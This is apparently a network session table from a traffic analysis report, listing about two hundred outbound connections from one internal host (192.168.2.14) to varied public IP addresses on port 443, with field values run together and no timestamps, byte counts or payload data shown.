                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20455192.168.2.1438054124.10.24.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20456192.168.2.1454244123.89.11.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20457192.168.2.144401871.247.189.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20458192.168.2.143925864.144.45.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20459192.168.2.1460528125.217.119.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20460192.168.2.144002077.43.185.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20461192.168.2.144291841.90.206.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20462192.168.2.145758271.155.127.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20463192.168.2.1447396158.215.38.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20464192.168.2.1443368203.36.137.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20465192.168.2.1452256156.82.64.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20466192.168.2.145466218.218.33.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20467192.168.2.145964617.244.167.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20468192.168.2.1443926200.84.133.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20469192.168.2.1445050151.251.24.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20470192.168.2.145978274.156.142.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20471192.168.2.145366041.198.112.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20472192.168.2.14369444.212.254.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20473192.168.2.145697497.158.25.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20474192.168.2.144488859.86.165.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20475192.168.2.1449342188.101.159.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20476192.168.2.144637862.208.9.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20477192.168.2.1439472113.146.226.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20478192.168.2.1438274139.17.51.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20479192.168.2.1442492156.94.11.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20480192.168.2.1455652182.182.138.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20481192.168.2.1442136115.90.18.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20482192.168.2.145823276.223.72.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20483192.168.2.1435498148.185.96.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20484192.168.2.146053459.240.160.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20485192.168.2.1438046167.206.11.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20486192.168.2.1447058219.246.21.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20487192.168.2.144268050.40.36.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20488192.168.2.144681044.146.47.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20489192.168.2.1453680170.56.223.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20490192.168.2.1445972217.7.249.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20491192.168.2.146048017.85.107.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20492192.168.2.1460724204.90.97.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20493192.168.2.145109257.59.88.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20494192.168.2.145642896.8.252.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20495192.168.2.146068023.52.159.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20496192.168.2.143953818.165.69.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20497192.168.2.1459928110.122.54.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20498192.168.2.1448840131.232.13.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20499192.168.2.145631427.222.21.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20500192.168.2.1449644118.199.98.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20501192.168.2.1443200217.214.191.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20502192.168.2.1437460197.5.85.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20503192.168.2.144345824.170.192.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20504192.168.2.144122283.211.10.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20505192.168.2.1456944115.5.233.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20506192.168.2.1445550173.214.66.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20507192.168.2.1442168105.110.127.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20508192.168.2.144282038.121.240.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20509192.168.2.145910218.116.87.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20510192.168.2.1442248153.254.232.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20511192.168.2.145384496.170.187.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20512192.168.2.145320087.227.222.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20513192.168.2.145453257.67.14.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20514192.168.2.1444440128.233.235.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20515192.168.2.1448590131.180.160.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20516192.168.2.1442044113.44.39.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20517192.168.2.1455914186.111.31.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20518192.168.2.14328761.207.162.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20519192.168.2.145184642.115.6.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20520192.168.2.145793652.181.209.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20521192.168.2.1434498212.129.115.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20522192.168.2.145673688.56.7.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20523192.168.2.1440258208.46.236.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20524192.168.2.143888494.8.48.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20525192.168.2.143757445.97.152.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20526192.168.2.1456756199.72.126.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20527192.168.2.145077272.108.178.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20528192.168.2.1445778173.130.130.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20529192.168.2.1444022105.255.114.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20530192.168.2.14350085.211.9.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20531192.168.2.143482659.145.156.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20532192.168.2.144857260.21.253.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20533192.168.2.144159040.49.52.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20534192.168.2.145930036.52.142.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20535192.168.2.1440740147.200.81.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20536192.168.2.1449094117.129.63.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20537192.168.2.1457886192.253.182.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20538192.168.2.1443234133.84.132.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20539192.168.2.144253651.76.196.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20540192.168.2.145465290.231.215.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20541192.168.2.1450774221.158.34.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20542192.168.2.1434348102.43.242.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20543192.168.2.143381031.13.90.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20544192.168.2.144671650.159.82.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20545192.168.2.1445462129.41.154.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20546192.168.2.1441204189.216.190.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20547192.168.2.145601885.25.13.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20548192.168.2.1460624217.209.52.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20549192.168.2.145439253.52.171.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20550192.168.2.1445644177.4.59.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20551192.168.2.1433536146.103.208.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20552192.168.2.1452366217.76.81.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20553192.168.2.1453790144.55.124.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20554192.168.2.1454938113.61.255.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20555192.168.2.1433200168.222.158.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20556192.168.2.1435062140.186.117.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20557192.168.2.145870275.33.126.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20558192.168.2.1445942156.220.174.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20559192.168.2.1457484121.86.217.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20560192.168.2.1443926121.46.209.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20561192.168.2.1459562170.212.235.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20562192.168.2.145714237.69.234.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20563192.168.2.1454310193.48.133.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20564192.168.2.14550744.2.156.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20565192.168.2.1458694198.149.171.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20566192.168.2.1453744139.19.238.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20567192.168.2.145351219.254.167.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20568192.168.2.143658088.10.211.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20569192.168.2.143871477.106.251.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20570192.168.2.1449912101.208.123.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20571192.168.2.1437248177.177.234.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20572192.168.2.1442222166.80.12.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20573192.168.2.1436006171.31.70.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20574192.168.2.1456696159.135.246.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20575192.168.2.1435960125.97.92.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20576192.168.2.143385819.239.204.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20577192.168.2.1443196203.32.118.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20578192.168.2.1437906164.68.171.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20579192.168.2.145693443.154.168.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20580192.168.2.1459760105.41.213.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20581192.168.2.145808425.154.21.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20582192.168.2.143384075.136.139.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20583192.168.2.144203070.37.222.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20584192.168.2.144322099.35.199.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20585192.168.2.144793285.12.70.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20586192.168.2.146064099.5.73.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20587192.168.2.1456656188.87.117.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20588192.168.2.1456672173.164.233.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20589192.168.2.143537845.50.202.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20590192.168.2.145866646.147.228.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20591192.168.2.146065618.232.249.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20592192.168.2.1445540196.79.221.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20593192.168.2.145579651.21.57.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20594192.168.2.1442902175.137.252.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20595192.168.2.1435818147.111.4.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20596192.168.2.144011850.152.58.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20597192.168.2.1434090151.250.32.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20598192.168.2.1451966201.233.219.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20599192.168.2.1435028122.56.69.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20600192.168.2.1460232129.44.39.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20601192.168.2.145871637.246.121.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20602192.168.2.14436321.166.158.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20603192.168.2.1449584213.231.27.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20604192.168.2.144132213.150.100.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20605192.168.2.1435932160.48.134.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20606192.168.2.1451808131.84.63.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20607192.168.2.1451938126.84.59.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20608192.168.2.144473497.207.240.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20609192.168.2.1438692134.210.167.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20610192.168.2.1441620157.54.26.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20611192.168.2.1434298191.211.187.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20612192.168.2.144001879.54.154.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20613192.168.2.1449112147.195.32.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20614192.168.2.1436602155.248.83.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20615192.168.2.1449164167.166.97.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20616192.168.2.144174618.79.186.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20617192.168.2.146058020.66.111.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20618192.168.2.14487765.89.27.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20619192.168.2.1441520154.92.251.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20620192.168.2.1441460133.177.210.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20621192.168.2.1451530182.158.133.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20622192.168.2.1437340198.68.26.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20623192.168.2.1449032111.165.140.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20624192.168.2.1434460165.176.122.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20625192.168.2.1452470160.185.253.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20626192.168.2.1432906208.61.159.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20627192.168.2.1459146102.133.215.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20628192.168.2.144431031.99.98.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20629192.168.2.1443762143.6.127.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20630192.168.2.1443432107.169.105.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20631192.168.2.1450152195.225.32.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20632192.168.2.145133894.61.14.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20633192.168.2.144685069.198.250.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20634192.168.2.1446712157.157.112.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20635192.168.2.1456626219.179.125.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20636192.168.2.1456044176.43.233.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20637192.168.2.143660454.183.65.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20638192.168.2.145946231.103.175.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20639192.168.2.146056248.134.14.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20640192.168.2.1438238149.221.233.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20641192.168.2.1437528146.13.216.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20642192.168.2.1453516192.241.43.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20643192.168.2.1447832156.100.239.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20644192.168.2.1437388179.29.177.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20645192.168.2.1459728202.41.190.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20646192.168.2.1449048152.186.226.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20647192.168.2.1453076213.148.178.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20648192.168.2.1451550130.31.114.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20649192.168.2.1433948121.216.225.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20650192.168.2.14400424.141.232.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20651192.168.2.1453086110.181.175.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20652192.168.2.1441162161.18.159.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20653192.168.2.1455848217.42.198.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20654192.168.2.145521031.129.190.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20655192.168.2.143334670.203.75.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20656192.168.2.145035283.179.187.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20657192.168.2.14484808.230.227.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20658192.168.2.1434844170.67.210.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20659192.168.2.144003248.60.73.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20660192.168.2.144053497.99.65.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20661192.168.2.1438610172.164.237.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20662192.168.2.145179697.172.211.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20663192.168.2.1446586109.102.181.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20664192.168.2.1452330198.70.241.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20665192.168.2.143288095.243.15.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20666192.168.2.1453824216.33.168.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
